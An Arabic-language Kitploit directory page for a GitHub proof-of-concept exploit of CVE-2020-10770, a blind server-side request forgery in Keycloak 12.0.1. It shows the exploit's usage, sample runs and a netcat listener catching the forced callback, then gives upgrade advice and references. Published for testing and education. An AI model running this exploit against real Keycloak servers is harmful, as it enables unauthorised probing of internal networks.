Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Keycloak-12.0.1-CVE-2020-10770 — Keycloak 12.0.1 - 'request_uri ' تزوير الطلبات من جانب الخادم الأعمى (SSRF) (بدون مصادقة) | Kitploit
أدوات/GitHubGitHub/coldfusionx/keycloak-12.0.1-cve-2020-10770
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubcoldfusionx/keycloak-12.0.1-cve-2020-10770

Keycloak-12.0.1-CVE-2020-10770

Keycloak 12.0.1 - 'request_uri ' تزوير الطلبات من جانب الخادم الأعمى (SSRF) (بدون مصادقة)

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
84منذ 4 سنواتلم تتم المراجعة بعد

Keycloak-12.0.1-CVE-2020-10770

Keycloak 12.0.1 - 'request_uri ' تزوير الطلبات من جانب الخادم بشكل أعمى (SSRF) (غير مصادق عليه)

Exploit-DB-50405

النتيجة المتوقعة: فحص منافذ المضيف المحلي (localhost) أو المضيفات المتاحة داخليًا.

مخصص للأغراض التعليمية والاختبار في بيئات الشركات فقط.

تم اختبار هذا الاستغلال على Python 3.8.6

التطبيق المعرض للخطر :

root@kitploit:~
docker run -p 9990:9990 -p 8080:8080 -e KEYCLOAK_USER=admin -e KEYCLOAK_PASSWORD=admin jboss/keycloak:12.0.1

الاستخدام:

root@kitploit:~
cfx:  ~/keycloak
→ python3 exploit.py -h
usage: exploit.py [-h] [-u URL]

-=[Keycloak Blind SSRF test by ColdFusionX]=-

optional arguments:
  -h, --help         show this help message and exit
  -u URL, --url URL  Keycloak Target URL (Example: http://127.0.0.1:8080)

Exploit Usage :
./exploit.py -u http://127.0.0.1:8080
[^] Input Netcat host:port -> 192.168.0.1:4444

إثبات المفهوم:

  • السيناريو 1: هدف غير معرض للخطر
root@kitploit:~
cfx:  ~/keycloak
→ python3 exploit.py -u http://localhost:8080

[+] Keycloak Bind SSRF test by ColdFusionX

[^] Input Netcat host:port -> 192.168.0.1:4444

[-] Invalid URL or Target not Vulnerable
  • السيناريو 2: هدف معرض للخطر
root@kitploit:~
cfx:  ~/keycloak
→ python3 exploit.py -u http://localhost:8080

[+] Keycloak Bind SSRF test by ColdFusionX

[^] Input Netcat host:port -> 192.168.0.1:9994

[+] BINGO! Check Netcat listener for HTTP callback :)

استدعاء HTTP على مستمع nc:

root@kitploit:~
cfx:  ~/keycloak
→ nc -lvnp 9994
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9994
Ncat: Listening on 0.0.0.0:9994
Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:36866.
GET / HTTP/1.1
Host: 192.168.0.1:9994
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.9.1)
Accept-Encoding: gzip,deflate

الحل

قم بالترقية إلى Keycloak 12.0.2 أو إصدار أحدث

المراجع

  • https://bugzilla.redhat.com/show_bug.cgi?id=1846270
  • https://nvd.nist.gov/vuln/detail/CVE-2020-10770
تنزيل الأداة